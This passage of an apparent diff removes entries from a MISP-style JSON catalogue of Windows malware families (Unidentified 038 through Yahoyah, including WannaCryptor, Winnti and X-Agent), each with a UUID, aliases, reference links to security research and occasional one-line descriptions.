"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" - ] - }, - "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", - "value": "Unidentified 038", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" - ] - }, - "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", - "value": "Unidentified 039", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" - ] - }, - "uuid": "88d70171-fc89-44d1-8931-035c0b095247", - "value": "Unidentified 041", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", - "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" - ] - }, - "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", - "value": "Unidentified 042", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" - ] - }, - "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", - "value": "Unidentified 044", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" - ] - }, - "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", - "value": "Unidentified 045", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ] - }, - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" - ] - }, - "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", - "value": "Unidentified 047", - "description": "RAT written in Delphi used by Patchwork APT." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ] - }, - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" - ] - }, - "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", - "value": "Unidentified 049 (Lazarus/RAT)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", - "https://twitter.com/CDA/status/1014144988454772736" - ] - }, - "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", - "value": "Unidentified 051", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" - ] - }, - "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", - "value": "Unidentified 052", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] - }, - "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", - "value": "Unidentified 053 (Wonknu?)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", - "https://twitter.com/struppigel/status/810753660737073153", - "https://twitter.com/bartblaze/status/976188821078462465" - ] - }, - "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", - "value": "Unlock92", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Rombrast" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", - "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", - "https://twitter.com/ulexec/status/1005096227741020160" - ] - }, - "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", - "value": "UPAS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", - "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://secrary.com/ReversingMalware/Upatre/" - ] - }, - "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", - "value": "Upatre", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" - ] - }, - "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", - "value": "Urausy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bebloh", - "Shiotob" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", - "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", - "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", - "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - 
"https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", - "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" - ] - }, - "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", - "value": "UrlZone", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Snake" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" - ] - }, - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Catch", - "grabnew", - "NeverQuest" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", - "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] - }, - "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", - "value": "Vawtrak", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", - "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" - ] - }, - "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", - "value": "Velso Ransomware", - "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. 
" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", - "https://twitter.com/JaromirHorejsi/status/813690129088937984" - ] - }, - "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", - "value": "Venus Locker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] - }, - "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", - "value": "Vermin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", - "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" - ] - }, - "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", - "value": "Vflooder", - "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", - "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" - ] - }, - "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", - "value": "virdetdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", - "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/" - ] - }, - "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", - "value": "Virut", - "description": "" - }, - { - "meta": { - "synonyms": [ - "VMzeus", - "ZeusVM", - "Zberp" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", - "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" - ] - }, - "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", - "value": "VM Zeus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", - "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" - ] - }, - "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", - "value": "Vobfus", - "description": "" - }, - { - "meta": { - "synonyms": [ - "FALLCHILL", - "Manuscrypt" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", - "https://www.us-cert.gov/ncas/alerts/TA17-318B" - ] - }, - "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", - "value": 
"Volgmer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", - "https://twitter.com/malware_traffic/status/821483557990318080" - ] - }, - "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", - "value": "Vreikstadi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", - "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", - "http://www.xylibox.com/2013/01/vskimmer.html", - "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" - ] - }, - "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", - "value": "vSkimmer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", - "https://attack.mitre.org/wiki/Group/G0022" - ] - }, - "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", - "value": "w32times", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Wcry", - "WannaCry", - "Wana Decrypt0r" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", - "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", - "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", - "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", - 
"https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html" - ] - }, - "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", - "value": "WannaCryptor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", - "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" - ] - }, - "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", - "value": "WaterMiner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - }, - "uuid": "d238262a-4832-408f-9926-a7174e671b50", - "value": "WaterSpout", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", - "value": "WebC2-AdSpace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", - "value": "WebC2-Ausov", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", - "value": "WebC2-Bolid", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", - "value": "WebC2-Cson", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "acdda3e5-e776-419b-b060-14f3406de061", - "value": "WebC2-DIV", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", - "value": "WebC2-GreenCat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", - 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", - "value": "WebC2-Head", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", - "value": "WebC2-Kt3", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", - "value": "WebC2-Qbp", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", - "value": "WebC2-Rave", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", - "value": "WebC2-Table", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": 
"b459033c-2d19-49aa-a21f-44a01d1a4156", - "value": "WebC2-UGX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", - "value": "WebC2-Yahoo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" - ] - }, - "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", - "value": "WebMonitor RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" - ] - }, - "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", - "value": "WellMess", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", - "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" - ] - }, - "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", - "value": "WildFire", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "6a100902-7204-4f20-b838-545ed86d4428", - "value": "WinMM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", - 
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", - "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", - "https://github.com/TKCERT/winnti-nmap-script", - "https://github.com/TKCERT/winnti-suricata-lua", - "https://github.com/TKCERT/winnti-detector" - ] - }, - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - }, - "uuid": "db755407-4135-414c-90e3-97f5e48c6065", - "value": "Winsloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" - ] - }, - "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", - "value": "Wipbot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Wimmie", - "Syndicasec" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", - "https://secrary.com/ReversingMalware/WMIGhost/", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", - "value": "WMI Ghost", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", - "value": "WndTest", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] - }, - "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", - "value": "Wonknu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", - "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" - ] - }, - "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", - "value": "woody", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WoolenLogger" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" - ] - }, - "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", - "value": "Woolger", - "description": "" - }, - { - "meta": { - "synonyms": [ - "splm", - "chopstick" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" - ] - }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" - ] - }, - "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", - "value": "XBot POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" - ] - }, - "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", - "value": "XBTL", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", - "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", - "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" - ] - }, - "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", - "value": "Xpan", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Expectra" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", - "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", - "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" - ] - }, - "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", - "value": "XPCTRA", - "description": "Incorporates code of Quasar RAT." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" - ] - }, - "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", - "value": "XP PrivEsc (CVE-2014-4076)", - "description": "" - }, - { - "meta": { - "synonyms": [ - "nokian" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", - "value": "xsPlus", - "description": "" - }, - { - "meta": { - "synonyms": [ - "xaps" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", - "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", - "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", - "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" - ] - }, - "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ShadowWalker" - ], - "type": [], - 
"refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" - ] - }, - "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", - "value": "xxmm", - "description": "" - }, - { - "meta": { - "synonyms": [ - "KeyBoy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - }, - "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", - "value": "Yahoyah", - "description": "" - }, - { - "meta": { - "synonyms": [ - "bbsinfo", - "aumlib" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", - "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" - ] - }, - "uuid": 